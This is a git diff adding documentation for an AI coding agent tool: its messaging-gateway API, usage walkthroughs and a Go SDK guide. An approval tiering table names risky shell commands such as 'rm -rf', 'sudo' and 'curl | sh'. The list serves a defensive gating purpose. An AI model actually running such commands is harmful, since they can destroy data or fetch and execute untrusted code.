+- QR code login, credentials saved to `<GLOBAL_DIR>/wechat-credentials.json`
+- Long-poll message receiving (no public IP needed)
+- Auto-relogin on session expiry
+- Typing indicator support
+
+### Feishu (Lark)
+
+- Official SDK: `github.com/larksuite/oapi-sdk-go/v3`
+- WebSocket long connection (no public IP needed)
+- Text message support
+- Auto-reconnect
+
+## WebSocket API
+
+### Connection
+
+```
+ws://localhost:8090/ws?session=<session_id>
+```
+
+When `server.auth_token` is configured, send the token with an HTTP header during the WebSocket handshake:
+
+```http
+Authorization: Bearer <auth_token>
+```
+
+The legacy `?token=` query parameter is still accepted for compatibility, but the header form avoids exposing tokens in URLs and logs.
+
+### Client → Server Messages
+
+```jsonc
+// Chat message
+{"type": "message", "content": "help me with this code"}
+
+// Slash command
+{"type": "command", "content": "/new"}
+
+// Approval response
+{"type": "approval", "approval_id": "ap_xxx", "approved": true}
+
+// Heartbeat
+{"type": "ping"}
+```
+
+### Server → Client Messages
+
+```jsonc
+// Connection confirmed
+{"type": "connected", "session_id": "...", "version": "..."}
+
+// Streaming text
+{"type": "text_delta", "content": "Let me help..."}
+
+// Thinking
+{"type": "think_delta", "content": "Analyzing..."}
+
+// Tool call
+{"type": "tool_call", "tool": "read", "call_id": "...", "args": {"path": "main.go"}}
+
+// Tool result
+{"type": "tool_result", "tool": "read", "call_id": "...", "result": "..."}
+
+// File diff
+{"type": "tool_diff", "call_id": "...", "path": "main.go", "diff": "..."}
+
+// Approval request (high risk)
+{"type": "approval_request", "approval_id": "ap_xxx", "tool": "bash", "args": {...}}
+
+// Usage stats
+{"type": "usage", "prompt_tokens": 1200, "completion_tokens": 350}
+
+// Turn complete
+{"type": "done", "stop_reason": "end_turn"}
+
+// Status message
+{"type": "status", "message": "Compaction triggered"}
+
+// Command response
+{"type": "command_result", "command": "/new", "message": "✅ New session created."}
+
+// Error
+{"type": "error", "message": "provider error"}
+
+// Heartbeat
+{"type": "pong"}
+```
+
+## HTTP REST API
+
+| Endpoint | Method | Auth | Description |
+|----------|--------|------|-------------|
+| `/api/health` | GET | No | Health check |
+| `/api/status` | GET | Yes | Service status |
+| `/api/sessions` | GET | Yes | List active sessions |
+| `/api/sessions/{id}` | GET | Yes | Session details |
+| `/api/sessions/{id}` | DELETE | Yes | Delete session |
+| `/api/memory` | GET | Yes | Read memory.md |
+| `/api/memory` | PUT | Yes | Update memory.md |
+| `/api/platforms` | GET | Yes | Platform status |
+| `/webhook/*` | POST | Secret | Webhook ingress |
+
+## Smart Approvals
+
+Tiered risk classification for tool calls:
+
+| Risk Level | WebSocket | Messaging Platform |
+|------------|-----------|-------------------|
+| Low | Auto-approve | Auto-approve |
+| Medium | Auto-approve + notify | Auto-approve + notify |
+| High | `approval_request` → wait for response (5min timeout) | Auto-reject + notify |
+
+**Risk Classification:**
+- **Low**: `go`, `make`, `npm`, `git status/log/diff`, `ls`, `cat`, `grep`, `find`
+- **Medium**: `mv`, `cp -r`, `git push`, `docker`, `curl`, `ssh`
+- **High**: `rm -rf`, `sudo`, `shutdown`, `curl | sh`, `eval`, `exec`
+
+## Pressure System
+
+### Context Pressure
+
+Fires `EventContextPressure` when context usage exceeds threshold (default: 55%).
+
+```jsonc
+{
+  "agent": {
+    "context_pressure": true,
+    "context_pressure_threshold": 0.55
+  }
+}
+```
+
+### Budget Pressure
+
+Fires `EventBudgetPressure` when remaining iterations reach threshold (default: 20%).
+
+```jsonc
+{
+  "agent": {
+    "budget_pressure": true,
+    "budget_pressure_threshold": 0.20
+  }
+}
+```
+
+Both are one-shot events: fire once per threshold crossing, not every turn.
+
+## Memory
+
+Persistent memory stored as `memory.md` (Markdown, human-readable).
+
+**Lookup Priority:**
+1. `memory.path` config → explicit path
+2. `.vibe/memory.md` → project memory
+3. `<GLOBAL_DIR>/memory.md` → global memory
+
+**Sections:**
+- `## User Profile` — User preferences
+- `## Working Memory` — Current context
+- `## Lessons Learned` — Accumulated knowledge
+
+**Default:** Writes to `.vibe/memory.md` (project directory).
+
+## Session Management
+
+- Each `platform:user_id` gets one persistent session
+- `/new` archives current session and creates new one
+- Sessions stored in `<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`
+- Auto-compaction when context window is full
+
+## A2A Protocol
+
+See [A2A Documentation](a2a.md) for Agent-to-Agent protocol details.
+
+## Security
+
+- **User Whitelist**: `allowed_users` per platform
+- **Auth Token**: Bearer token for HTTP/WebSocket API
+- **Allowed Work Dirs**: Restrict working directories
+- **Shell Hooks**: Pre/post tool call external scripts
+- **Smart Approvals**: Tiered risk classification
diff --git a/docs/en/scenarios.md b/docs/en/scenarios.md
new file mode 100644
index 0000000..52fdcc0
--- /dev/null
+++ b/docs/en/scenarios.md
@@ -0,0 +1,533 @@
+# Scenarios & Walkthroughs
+
+This document demonstrates VibeCoding's various usage modes through practical scenarios.
+
+---
+
+## Scenario 1: Daily Coding (Single Agent Mode)
+
+The most basic usage — conversing with AI in the terminal for everyday development tasks.
+
+### Setup
+
+```bash
+# Set API key
+export DEEPSEEK_API_KEY=sk-...
+
+# Enter project directory
+cd ~/projects/myapp
+```
+
+### A: Code Explanation
+
+```bash
+$ vibecoding "explain the core logic of internal/agent/agent.go"
+```
+
+VibeCoding will:
+1. Load context files (`AGENTS.md`, `CLAUDE.md`)
+2. Read the file with `read`
+3. Explore related code with `ls`, `grep`
+4. Output a structured explanation
+
+### B: Bug Fix
+
+```bash
+$ vibecoding
+```
+
+```
+> fix the null pointer error in handler.go
+
+[Agent]
+  📄 read("internal/handler.go", offset=45, limit=20)
+  → Found: line 52 doesn't check if err is nil
+
+  📝 edit("internal/handler.go", edits=[
+    {oldText: "resp, _ := client.Do(req)",
+     newText: "resp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}"}
+  ])
+  → Edit successful
+
+  🔧 bash("go build ./...")
+  → Build passed
+
+✅ Fixed: added error check at line 52
+```
+
+### C: Adding a New Feature
+
+```
+> add a /health endpoint to the HTTP handler
+
+[Agent]
+  📄 plan(title="Add /health endpoint", steps=[
+    {title: "Read existing handler structure", status: "running"},
+    {title: "Add health handler", status: "pending"},
+    {title: "Register route", status: "pending"},
+    {title: "Add tests", status: "pending"},
+    {title: "Verify build", status: "pending"}
+  ])
+
+  📄 read("internal/server/routes.go")
+  📝 edit(...)  # Add handler
+  📝 edit(...)  # Register route
+  🔧 bash("go test ./internal/server/ -run TestHealth")
+  🔧 bash("go build ./...")
+
+  📄 plan(..., steps=[..., {title: "Verify build", status: "done"}])
+
+✅ Done: /health endpoint added and tested
+```
+
+### Mode Selection Guide
+
+| Task | Recommended Mode | Command |
+|------|-----------------|---------|
+| Read code, learn project | `plan` | `vibecoding --mode plan` |
+| Write code, fix bugs | `agent` (default) | `vibecoding` |
+| Install deps, system ops | `yolo` | `vibecoding --mode yolo` |
+
+---
+
+## Scenario 2: Non-Interactive Mode (CI/Script Integration)
+
+Use VibeCoding in CI pipelines or scripts.
+
+### A: Code Review
+
+```bash
+# Review PR in CI
+git diff main..feature | vibecoding -P "review this diff, point out potential issues"
+```
+
+### B: Automated Refactoring
+
+```bash
+# Batch refactoring
+vibecoding -P "change all fmt.Errorf calls to use %w for error wrapping" --mode yolo
+```
+
+### C: Generate Documentation
+
+```bash
+# Generate README for a package
+vibecoding -P "generate README.md for internal/cache package with usage examples" --mode yolo
+```
+
+---
+
+## Scenario 3: Multi-Agent Mode (Complex Task Delegation)
+
+Enable sub-agent tools with `--multi-agent` to split and execute complex tasks in parallel.
+
+### Launch
+
+```bash
+$ vibecoding --multi-agent
+```
+
+### Scenario: Parallel Refactoring and Testing
+
+```
+> I need: 1) rename internal/cache to internal/store
+>        2) ensure all tests pass at the same time
+
+[Agent]
+  🤖 subagent_spawn(task="Rename internal/cache to internal/store, update all import paths",
+                     mode="agent",
+                     tools=["read", "write", "edit", "bash", "grep", "find"])
+
+  → Handle: "agent-1"
+
+  🤖 subagent_spawn(task="Run full test suite, report failures",
+                     mode="agent",
+                     tools=["read", "bash", "grep", "find"])
+
+  → Handle: "agent-2"
+
+  ... wait for sub-agents ...
+
+  🤖 subagent_status(handle="agent-1")
+  → Status: completed
+  → Result: "Renamed cache to store, updated 15 files' import paths"
+
+  🤖 subagent_status(handle="agent-2")
+  → Status: completed
+  → Result: "3 tests failed: TestCacheGet, TestCacheSet, TestCacheDelete"
+
+  🤖 subagent_send(handle="agent-1", message="Fix the 3 failing tests reported by agent-2")
+
+  ... sub-agent continues ...
+
+✅ Done: package renamed, all tests pass
+```
+
+### Sub-Agent Tools Summary
+
+| Tool | Purpose |
+|------|---------|
+| `subagent_spawn` | Start sub-agent, returns handle |
+| `subagent_status` | Query sub-agent status and results |
+| `subagent_send` | Send follow-up instructions |
+| `subagent_destroy` | Stop and clean up sub-agent |
+
+### Multi-Agent + Cron Scheduling
+
+```bash
+# Daily code review
+vibecoding hermes cron add "daily-review" \
+  "review the last 24 hours of git changes, output an issue report" \
+  --schedule "@daily"
+```
+
+---
+
+## Scenario 4: VS Code ACP Integration
+
+Use VibeCoding directly in VS Code as an AI coding assistant.
+
+### Step 1: Install
+
+```bash
+npm install -g vibecoding-installer
+```
+
+### Step 2: Configure VS Code
+
+Edit VS Code's `settings.json`:
+
+```json
+{
+  "acp.agents": {
+    "vibecoding": {
+      "command": "vibecoding",
+      "args": ["acp", "--mode", "agent", "--multi-agent"],
+      "description": "VibeCoding AI Assistant"
+    }
+  }
+}
+```
+
+### Step 3: Use
+
+1. Open your project in VS Code
+2. Open the ACP panel (via extension)
+3. Ask questions or request code changes directly
+
+**Experience in VS Code:**
+
+```
+You: change ParseConfig in utils.go to support YAML format
+
+VibeCoding:
+  [tool_call: read utils.go]
+  [tool_call: edit utils.go]
+  [tool_call: bash "go test ./..."]
+  ✅ YAML support added, all tests pass
+```
+
+### ACP Mode Special Capabilities
+
+| Capability | Description |
+|------------|-------------|
+| Session Management | IDE auto-manages session create/load/continue |
+| Permission Requests | IDE popup for high-risk operations |
+| MCP Integration | IDE can pass MCP server configs |
+| Multi-Agent | Enable sub-agent tools via `--multi-agent` |
+
+---
+
+## Scenario 5: A2A Standalone Server Mode
+
+Run VibeCoding as an A2A server for other agents to call.
+
+### A: Start Standalone A2A Server
+
+```bash
+# Initialize config
+vibecoding a2a --init-a2a-config
+
+# Edit a2a.json (optional)
+vim ~/.vibecoding/a2a.json
+
+# Start server
+vibecoding a2a start --port 8093 --work-dir ~/projects/myapp
+```
+
+### B: Other Agents Call It
+
+```bash
+# Using vibecoding client
+vibecoding a2a send "list all Go files in the project" --target http://localhost:8093
+
+# Using curl
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "run all tests"}]
+      }
+    },
+    "id": 1
+  }'
+
+# Discover remote agent capabilities
+vibecoding a2a discover http://localhost:8093
+```
+
+### C: A2A Server with Authentication
+
+```bash
+# Start with auth token
+vibecoding a2a start --auth-token "my-secret-token-xxx"
+
+# Client call with token
+vibecoding a2a send "review main.go" \
+  --target http://remote-server:8093 \
+  --auth-token "my-secret-token-xxx"
+```
+
+---
+
+## Scenario 6: A2A Master Mode (Cross-Machine Agent Dispatch)
+
+Manage multiple remote A2A agents, letting the LLM automatically dispatch tasks.
+
+### Architecture
+
+```
+┌─────────────────────────────────────────────────────────┐
+│  Local (VibeCoding + A2A Master)                         │
+│                                                         │
+│  vibecoding --enable-a2a-master                         │
+│  ┌─────────────────────────────────────────────────┐   │
+│  │  LLM auto-decides → a2a_dispatch tool            │   │
+│  └─────────────────────────────────────────────────┘   │
+│           │                   │                         │
+│           ▼                   ▼                         │
+│  ┌──────────────┐   ┌──────────────┐                   │
+│  │ code-reviewer│   │  ci-agent    │                   │
+│  │ 192.168.1.10 │   │ 192.168.1.20 │                   │
+│  │ :8093        │   │ :8093        │                   │
+│  └──────────────┘   └──────────────┘                   │
+└─────────────────────────────────────────────────────────┘
+```
+
+### Step 1: Start A2A Servers on Remote Machines
+
+**Machine A (Code Review Agent):**
+```bash
+# 192.168.1.10
+vibecoding a2a start --port 8093 --work-dir ~/projects/shared
+```
+
+**Machine B (CI Agent):**
+```bash
+# 192.168.1.20
+vibecoding a2a start --port 8093 --work-dir ~/ci-runner --auth-token "ci-secret"
+```
+
+### Step 2: Initialize Master Config Locally
+
+```bash
+# Generate sample config
+vibecoding --init-a2a-master-config
+
+# Edit a2a-list.json
+vim ~/.vibecoding/a2a-list.json
+```
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://192.168.1.10:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://192.168.1.20:8093",
+      "auth_token": "ci-secret"
+    }
+  ]
+}
+```
+
+### Step 3: Enable Master Mode
+
+```bash
+$ vibecoding --enable-a2a-master --verbose
+```
+
+```
+A2A master mode enabled: 2 agents loaded from /home/user/.vibecoding/a2a-list.json
+
+> review internal/handler.go for code quality, then run tests to make sure nothing breaks
+
+[Agent]
+  I'll dispatch tasks to both remote agents:
+
+  🔧 a2a_dispatch(agent_name="code-reviewer",
+                   message="Review internal/handler.go for code quality, focus on
+                           error handling, performance, and security")
+
+  → code-reviewer returns: "Found 3 issues: 1) Line 45 doesn't handle timeout..."
+
+  🔧 a2a_dispatch(agent_name="ci-agent",
+                   message="Run the full test suite, report results")
+
+  → ci-agent returns: "47/47 tests passed, coverage 82%"
+
+✅ Summary:
+- Code review found 3 issues (details listed)
+- All tests pass, coverage 82%
+- Recommend fixing timeout handling on line 45 first
+```
+
+---
+
+## Scenario 7: Gateway Mode (HTTP API)
+
+Run VibeCoding as an OpenAI-compatible HTTP service for other applications to call.
+
+### Initialize and Start
+
+```bash
+# Generate config template
+vibecoding --init-gateway
+
+# Edit gateway.json (set token, port, etc.)
+vim ~/.vibecoding/gateway.json
+
+# Start gateway
+vibecoding gateway --port 8080 --work-dir ~/projects/myapp
+```
+
+### Call It
+
+```bash
+# curl (OpenAI-compatible format)
+curl http://localhost:8080/v1/chat/completions \
+  -H "Authorization: Bearer your-token" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [
+      {"role": "user", "content": "explain this project architecture"}
+    ]
+  }'
+
+# Python OpenAI SDK
+from openai import OpenAI
+client = OpenAI(base_url="http://localhost:8080/v1", api_key="your-token")
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "write an HTTP middleware"}]
+)
+```
+
+---
+
+## Scenario 8: Hermes Messaging Gateway
+
+Connect VibeCoding to WeChat/Feishu for unattended AI coding assistant.
+
+### Start
+
+```bash
+# Configure hermes.json
+vim ~/.vibecoding/hermes.json
+
+# Start
+vibecoding hermes start
+```
+
+### Typical Config
+
+```json
+{
+  "server": { "port": 8090, "auth_token": "my-token" },
+  "platforms": {
+    "wechat": { "enabled": true },
+    "feishu": { "enabled": true, "app_id": "...", "app_secret": "..." }
+  },
+  "default_mode": "yolo",
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": ["/srv/projects"]
+  },
+  "a2a": { "enabled": true },
+  "cron": { "enabled": true },
+  "memory": { "enabled": true }
+}
+```
+
+### Usage in Messaging Platform
+
+```
+User: /new
+Bot:  New session created
+
+User: add rate limiting middleware to the api package
+Bot:  [executing...]
+      ✅ Added rate limiting middleware with configurable requests/sec
+      Modified: internal/api/middleware.go, internal/api/routes.go
+
+User: run tests
+Bot:  [running go test ./...]
+      ✅ All passed (12/12)
+```
+
+---
+
+## Scenario 9: Combined Modes (Multi-Tool Workflow)
+
+Combine multiple modes for a complete development workflow.
+
+### Example: Develop + Review + Deploy
+
+```bash
+# 1. Local development (TUI mode)
+cd ~/projects/myapp
+vibecoding --mode yolo
+
+# 2. Pre-commit review (Plan mode)
+vibecoding --mode plan "review all changes in git diff"
+
+# 3. Post-push CI review (Gateway mode)
+# In CI script:
+curl http://gateway:8080/v1/chat/completions \
+  -d '{"messages": [{"role": "user", "content": "review PR #42"}]}'
+
+# 4. Scheduled security scan (Hermes + Cron)
+vibecoding hermes cron add "security-scan" \
+  "scan for security vulnerabilities and sensitive data leaks" \
+  --schedule "@weekly"
+```
+
+---
+
+## Quick Reference
+
+| Scenario | Command |
+|----------|---------|
+| Daily coding | `vibecoding` |
+| Read-only analysis | `vibecoding --mode plan` |
+| Full access | `vibecoding --mode yolo` |
+| Non-interactive | `vibecoding -P "..."` |
+| Multi-agent | `vibecoding --multi-agent` |
+| A2A server | `vibecoding a2a start` |
+| A2A master | `vibecoding --enable-a2a-master` |
+| HTTP gateway | `vibecoding gateway` |
+| Messaging gateway | `vibecoding hermes start` |
+| IDE integration | `vibecoding acp` |
+| Continue session | `vibecoding -c` |
+| Resume session | `vibecoding -r <id>` |
+| Init gateway config | `vibecoding --init-gateway` |
+| Init A2A config | `vibecoding a2a --init-a2a-config` |
+| Init master config | `vibecoding --init-a2a-master-config` |
diff --git a/docs/en/sdk.md b/docs/en/sdk.md
new file mode 100644
index 0000000..834bda8
--- /dev/null
+++ b/docs/en/sdk.md
@@ -0,0 +1,532 @@
+# SDK Integration Guide
+
+VibeCoding exposes a public Go package (`github.com/startvibecoding/vibecoding/agent`) that lets you embed an AI coding agent into your own applications. This guide covers:
+
+1. [Public Agent Package](#public-agent-package) — types, interfaces, and Builder API
+2. [Implementing a Custom Provider](#implementing-a-custom-provider) — bring your own LLM backend
+3. [Building and Running an Agent](#building-and-running-an-agent) — creating an agent and processing events
+4. [Event Types](#event-types) — understanding the event stream
+5. [Sub-Agent Mode](#sub-agent-mode) — delegating tasks to child agents
+
+---
+
+## Public Agent Package
+
+Import path:
+
+```go
+import "github.com/startvibecoding/vibecoding/agent"
+```
+
+This package contains **only public types and interfaces** — no internal dependencies. It defines:
+
+| Type | Description |
+|------|-------------|
+| `Agent` | Interface for all agent implementations |
+| `Provider` | Interface for LLM backends |
+| `Builder` | Fluent API for creating Agent instances |
+| `Event` / `EventType` | Agent event stream types |
+| `Message` / `ContentBlock` | Conversation message types |
+| `ChatParams` / `StreamEvent` | LLM request/response types |
+| `ModelInfo` / `ModelCompat` | Model metadata and compatibility flags |
+| `BaseProvider` | Embeddable helper for common Provider methods |
+
+### Agent Interface
+
+```go
+type Agent interface {
+    // ID returns the unique identifier for this agent.
+    ID() AgentID
+
+    // ParentID returns the parent agent's ID, or empty if top-level.
+    ParentID() AgentID
+
+    // Run processes a user message and streams events back.
+    Run(ctx context.Context, userMsg string) <-chan Event
+
+    // RunWithMessages processes with explicit message history.
+    RunWithMessages(ctx context.Context, messages []Message) <-chan Event
+
+    // Abort signals the agent to stop processing.
+    Abort()
+
+    // GetMessages returns a copy of the current message history.
+    GetMessages() []Message
+
+    // SetMessages replaces the message history.
+    SetMessages(msgs []Message)
+
+    // GetContext returns a copy of the current agent context.
+    GetContext() *AgentContext
+
+    // SetContext replaces the agent context.
+    SetContext(ctx *AgentContext)
+
+    // GetContextUsage returns the current context window usage.
+    GetContextUsage() *ContextUsage
+
+    // LoadHistoryMessages loads historical messages into agent context.
+    LoadHistoryMessages(messages []Message)
+
+    // HandleApprovalResponse processes the user's approval response.
+    HandleApprovalResponse(approvalID string, approved bool)
+}
+```
+
+### Provider Interface
+
+```go
+type Provider interface {
+    // Chat sends a chat request and returns a channel of streaming events.
+    Chat(ctx context.Context, params ChatParams) <-chan StreamEvent
+
+    // Name returns the provider's name (e.g. "openai", "anthropic").
+    Name() string
+
+    // Models returns the list of available models.
+    Models() []ModelInfo
+
+    // GetModel returns a model by ID, or nil if not found.
+    GetModel(id string) *ModelInfo
+}
+```
+
+---
+
+## Implementing a Custom Provider
+
+To integrate your own LLM backend, implement the `agent.Provider` interface. Embed `agent.BaseProvider` for free `Name()` / `Models()` / `GetModel()` implementations:
+
+```go
+package mybackend
+
+import (
+    "context"
+
+    "github.com/startvibecoding/vibecoding/agent"
+)
+
+type MyProvider struct {
+    agent.BaseProvider
+    apiKey string
+}
+
+func NewMyProvider(apiKey string) *MyProvider {
+    models := []agent.ModelInfo{
+        {
+            ID:            "my-model-v1",
+            Name:          "My Model V1",
+            Provider:      "mybackend",
+            ContextWindow: 128000,
+            MaxTokens:     8192,
+        },
+    }
+    return &MyProvider{
+        BaseProvider: agent.NewBaseProvider("mybackend", models),
+        apiKey:       apiKey,
+    }
+}
+
+func (p *MyProvider) Chat(ctx context.Context, params agent.ChatParams) <-chan agent.StreamEvent {
+    ch := make(chan agent.StreamEvent, 100)
+
+    go func() {
+        defer close(ch)
+
+        // 1. Send StreamStart
+        ch <- agent.StreamEvent{Type: agent.StreamStart}
+
+        // 2. Call your LLM API, stream responses...
+        // For each text chunk:
+        ch <- agent.StreamEvent{
+            Type:      agent.StreamTextDelta,
+            TextDelta: "Hello from my model!",
+        }
+
+        // 3. If model requests tool calls:
+        // ch <- agent.StreamEvent{
+        //     Type: agent.StreamToolCall,
+        //     ToolCall: &agent.ToolCallBlock{
+        //         ID:        "call_1",
+        //         Name:      "bash",
+        //         Arguments: []byte(`{"command":"ls"}`),
+        //     },
+        // }
+
+        // 4. Report usage
+        ch <- agent.StreamEvent{
+            Type: agent.StreamUsage,
+            Usage: &agent.Usage{
+                InputTokens:  100,
+                OutputTokens: 50,
+                TotalTokens:  150,
+            },
+        }
+
+        // 5. Signal completion
+        ch <- agent.StreamEvent{
+            Type:       agent.StreamDone,
+            StopReason: "end_turn",
+        }
+    }()
+
+    return ch
+}
+```
+
+You can also use `WithProviderByName()` on the Builder to resolve a built-in provider by vendor name, base URL, API type, and API key without implementing `Provider` yourself:
+
+```go
+a, err := agent.NewBuilder().
+    WithProviderByName("openai", "", "openai-chat", os.Getenv("OPENAI_API_KEY")).
+    WithModel("gpt-4o").
+    Build()
+```
+
+---
+
+## Building and Running an Agent
+
+Use the `Builder` fluent API to create an agent:
+
+```go
+package main
+
+import (
+    "context"
+    "fmt"
+    "os"
+
+    "github.com/startvibecoding/vibecoding/agent"
+    _ "github.com/startvibecoding/vibecoding/internal/agent" // register internal builder
+)
+
+func main() {
+    a, err := agent.NewBuilder().
+        WithProvider(mybackend.NewMyProvider(os.Getenv("MY_API_KEY"))).
+        WithModel("my-model-v1").
+        WithMode("agent").                          // "plan", "agent", or "yolo"
+        WithWorkDir("/home/user/project").
+        WithThinkingLevel(agent.ThinkingMedium).
+        WithMaxTokens(16384).
+        WithMaxIterations(200).
+        WithToolExecutionMode("parallel").           // "parallel" or "sequential"
+        WithSystemPromptExtra("Focus on Go code.").
+        WithCompaction(true, 16384).
+        WithApprovalHandler(func(toolCallID, toolName string, args map[string]any) bool {
+            fmt.Printf("Approve %s? [y/n] ", toolName)
+            var input string
+            fmt.Scanln(&input)
+            return input == "y"
+        }).
+        Build()
+    if err != nil {
+        panic(err)
+    }
+
+    ctx := context.Background()
+    events := a.Run(ctx, "List all Go files in this project")
+
+    for event := range events {
+        switch event.Type {
+        case agent.EventTextDelta:
+            fmt.Print(event.TextDelta)
+        case agent.EventThinkDelta:
+            // thinking content (optional)
+        case agent.EventToolCall:
+            fmt.Printf("\n[tool: %s]\n", event.ToolCall.Name)
+        case agent.EventToolExecutionEnd:
+            fmt.Printf("[result: %s]\n", truncate(event.ToolResult, 200))
+        case agent.EventToolApprovalRequest:
+            // Handle approval (see Builder.WithApprovalHandler)
+        case agent.EventError:
+            fmt.Fprintf(os.Stderr, "Error: %v\n", event.Error)
+        case agent.EventDone:
+            fmt.Printf("\n--- Done (reason: %s) ---\n", event.StopReason)
+        }
+    }
+}
+
+func truncate(s string, n int) string {
+    if len(s) > n {
+        return s[:n] + "..."
+    }
+    return s
+}
+```
+
+### Builder Options
+
+| Method | Default | Description |
+|--------|---------|-------------|
+| `WithProvider(p)` | *required* | LLM provider |
+| `WithProviderByName(vendor, baseURL, api, apiKey)` | — | Resolve built-in provider |
+| `WithModel(id)` | first model | Model ID |
+| `WithMode(mode)` | `"agent"` | `"plan"` / `"agent"` / `"yolo"` |
+| `WithWorkDir(dir)` | `os.Getwd()` | Working directory |
+| `WithThinkingLevel(level)` | `ThinkingMedium` | `Off` / `Minimal` / `Low` / `Medium` / `High` / `XHigh` |
+| `WithMaxTokens(n)` | `16384` | Max output tokens |
+| `WithMaxIterations(n)` | `200` | Safety limit for loop iterations |
+| `WithToolExecutionMode(m)` | `"parallel"` | `"parallel"` / `"sequential"` |
+| `WithTools(names)` | all | Filter available tools |
+| `WithSystemPromptExtra(s)` | `""` | Extra system prompt context |
+| `WithSandbox(bool)` | `false` | Enable sandbox isolation |
+| `WithSessionDir(dir)` | `~/.vibecoding/sessions` | Session persistence |
+| `WithCompaction(enabled, reserve)` | `true, 16384` | Context compaction settings |
+| `WithMultiAgent(bool)` | `false` | Enable sub-agent tools |
+| `WithApprovalHandler(fn)` | nil | Custom tool approval callback |
+
+---
+
+## Event Types
+
+The `Event` stream follows the agent lifecycle:
+
+```
+EventAgentStart
+  └─ EventTurnStart
+       ├─ EventTextDelta (streaming text)
+       ├─ EventThinkDelta (streaming thinking)
+       ├─ EventToolCall (tool requested)
+       ├─ EventToolExecutionStart → EventToolExecutionEnd
+       ├─ EventToolResult
+       ├─ EventToolApprovalRequest → EventToolApprovalResponse
+       ├─ EventPlanUpdate
+       └─ EventUsage
+  └─ EventTurnEnd
+  └─ ... (more turns if tool calls trigger continuation)
+  └─ EventDone
+EventAgentEnd
+```
+
+| EventType | Key Fields | Description |
+|-----------|------------|-------------|
+| `EventAgentStart` | — | Agent begins processing |
+| `EventAgentEnd` | `Messages` | Agent finished, final message history |
+| `EventTurnStart` | — | New LLM turn begins |
+| `EventTurnEnd` | `TurnMessage`, `ContextUsage` | Turn completed |
+| `EventTextDelta` | `TextDelta` | Incremental text from LLM |
+| `EventThinkDelta` | `ThinkDelta` | Incremental thinking from LLM |
+| `EventToolCall` | `ToolCall`, `ToolArgs` | LLM requests a tool call |
+| `EventToolExecutionStart` | `ToolCallID`, `ToolName`, `ToolArgs` | Tool execution begins |
+| `EventToolExecutionEnd` | `ToolCallID`, `ToolResult`, `ToolDiff`, `ToolError` | Tool execution completed |
+| `EventToolResult` | `ToolCallID`, `ToolResult` | Tool result recorded |
+| `EventToolApprovalRequest` | `ApprovalID`, `ApprovalTool`, `ApprovalArgs` | Tool needs user approval |
+| `EventPlanUpdate` | `Plan` | Structured task plan update |
+| `EventUsage` | `Usage`, `ContextUsage` | Token usage report |
+| `EventDone` | `StopReason`, `Usage` | Agent loop completed |
+| `EventError` | `Error`, `StopReason` | Error occurred |
+| `EventCompactionStart/End` | `StatusMessage` | Context compaction lifecycle |
+
+---
+
+## Sub-Agent Mode
+
+Sub-agent mode allows the main agent to delegate bounded, independent subtasks to child agents running in parallel. Enable it via CLI (`--multi-agent`) or SDK (`WithMultiAgent(true)`).
+
+### Architecture Overview
+
+```
+┌─────────────────────────────────────────────────┐
+│                 Main Agent                       │
+│  - Full system prompt, tools, context           │
+│  - Orchestrator role                             │
+│  - Has subagent_* tools                         │
+├─────────────────────────────────────────────────┤
+│         AgentManager                             │
+│   ┌──────────┐  ┌──────────┐  ┌──────────┐     │
+│   │ SubAgent │  │ SubAgent │  │ SubAgent │     │
+│   │    #1    │  │    #2    │  │    #3    │     │
+│   │ (search) │  │ (review) │  │ (test)   │     │
+│   └──────────┘  └──────────┘  └──────────┘     │
+│         ↑            ↑             ↑             │
+│     Isolated     Isolated      Isolated          │
+│     context,     context,      context,          │
+│     registry,    registry,     registry,         │
+│     session      session       session           │
+└─────────────────────────────────────────────────┘
+```
+
+### Key Components
+
+| Component | Package | Description |
+|-----------|---------|-------------|
+| `AgentManager` | `internal/agent` | Manages lifecycle of all agent instances, tracks parent/child relationships, enforces policies |
+| `AgentFactory` | `internal/agent` | Creates agents with consistent configuration and isolated tool registries |
+| `EventRouter` | `internal/agent` | Routes events by `AgentID` to agent-specific or global handlers |
+| `SubAgentPolicy` | `internal/agent` | Security constraints: max children (5), allowed modes, timeout per agent (10min) |
+| `subagent_*` tools | `internal/agent` | Tools the main agent uses to spawn/manage sub-agents |
+
+### Sub-Agent Tools
+
+When multi-agent mode is enabled, the main agent gets four tools:
+
+#### `subagent_spawn`
+
+Create and start a sub-agent for a bounded task.
+
+```json
+{
+  "task": "Search for all usages of the deprecated function X in src/",
+  "mode": "agent",
+  "work_dir": "/home/user/project",
+  "tools": ["read", "grep", "find", "ls"],
+  "max_iterations": 50,
+  "system_prompt_extra": "Focus only on the src/ directory"
+}
+```
+
+Returns a handle for polling:
+
+```json
+{
+  "handle": "agent-1",
+  "status": "running",
+  "timeout": "10m0s"
+}
+```
+
+#### `subagent_status`
+
+Check a sub-agent's status and get results:
+
+```json
+{
+  "handle": "agent-1"
+}
+```
+
+Returns:
+
+```json
+{
+  "handle": "agent-1",
+  "status": "done",
+  "message_count": 12,
+  "last_response": "Found 3 usages of function X: ...",
+  "updated_at": "2025-05-28T10:30:00Z"
+}
+```
+
+Possible status values: `"ready"`, `"running"`, `"done"`, `"error"`.
+
+#### `subagent_send`
+
+Send a follow-up message to a running sub-agent:
+
+```json
+{
+  "handle": "agent-1",
+  "message": "Also check the test/ directory"
+}
+```
+
+#### `subagent_destroy`
+
+Destroy a finished sub-agent and release resources:
+
+```json
+{
+  "handle": "agent-1"
+}
+```
+
+### Sub-Agent Policy and Constraints
+
+| Constraint | Default | Description |
+|------------|---------|-------------|
+| Max children | 5 | Maximum concurrent sub-agents per parent |
+| Allowed modes | `["agent"]` | Sub-agents default to agent mode |
+| Timeout per agent | 10 minutes | Each sub-agent has an independent timeout |
+| Total timeout | 30 minutes | Global timeout for all sub-agents |
+| Nesting | Disabled | Sub-agents **cannot** spawn their own sub-agents |
